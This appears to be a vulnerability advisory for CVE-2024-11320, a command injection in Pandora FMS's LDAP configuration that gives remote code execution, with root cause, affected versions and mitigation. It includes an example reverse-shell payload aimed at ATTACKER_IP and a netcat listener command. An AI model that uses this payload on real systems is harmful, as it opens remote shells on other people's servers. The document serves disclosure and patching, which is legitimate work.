CVE-2024-11320: Remote Code Execution in Pandora FMS via LDAP Injection
Repository: https://github.com/mhaskar/CVE-2024-11320
CVE ID: CVE-2024-11320
CVSS Score: 9.8 (Critical)
Affected Versions: Pandora FMS v7.0NG.700 to v7.0NG.777.4
Discovered by: Askar (https://github.com/mhaskar)
Summary
CVE-2024-11320 is a critical command injection vulnerability in Pandora FMS, a monitoring software solution. The flaw allows remote attackers with administrative access to execute arbitrary system commands through the web-based LDAP authentication configuration interface.
A public proof-of-concept (PoC) exploit was released by Askar, demonstrating the vulnerability with a functional Python script that launches a reverse shell from the target system.
Vulnerability Details
- Type: OS Command Injection (CWE-77)
- Impact: Remote Code Execution (RCE)
- Trigger Point: LDAP authentication configuration
- Required Access: Admin-level login to the web panel
Root Cause
Pandora FMS fails to properly sanitize input values submitted to the LDAP configuration fields. When attackers insert shell metacharacters and payloads into the ldap_admin_login
field, the backend processes the malicious input and executes it on the server, leading to arbitrary code execution.
Proof of Concept
The PoC pandora-exploit.py
carries out the following:
- Logs in using valid admin credentials and retrieves a CSRF token.
- Sends a POST request to change the authentication method to LDAP.
- Injects a reverse shell payload in the
ldap_admin_login
field.
- Waits for a reverse connection from the target.
Example Payload
payload = "';php -r '\$sock=fsockopen(\"ATTACKER_IP\",PORT);exec(\"/bin/sh -i <&3 >&3 2>&3\");' #"
Screenshot
The repo includes pandora-poc.png
, showing a successful reverse shell session received on the attacker's listener, confirming exploitation.
Exploit Requirements
- Admin credentials for the Pandora web interface
- Vulnerable version of Pandora FMS (<= 7.0NG.777.4)
- Python 3 with
requests
and bs4
libraries
- A listener running (e.g.,
nc -lvnp PORT
)
Affected Versions
- Pandora FMS from v7.0NG.700 up to and including v7.0NG.777.4
Mitigation
- Upgrade to v7.0NG.777.5 or later to patch the vulnerability.
- Disable LDAP authentication if not required.
- Monitor and restrict admin access to the Pandora web interface.
Timeline
- Vulnerability discovered: Early 2024
- PoC published by mhaskar: March 2024
- Patch released by Pandora FMS: April 2024
- CVE published: CVE-2024-11320
References
Conclusion
CVE-2024-11320 poses a significant threat to Pandora FMS installations with outdated versions and active admin interfaces. The availability of a public exploit lowers the bar for attacks, making immediate patching critical. Organizations should audit authentication configuration endpoints, apply updates, and limit administrative access to reduce their risk exposure.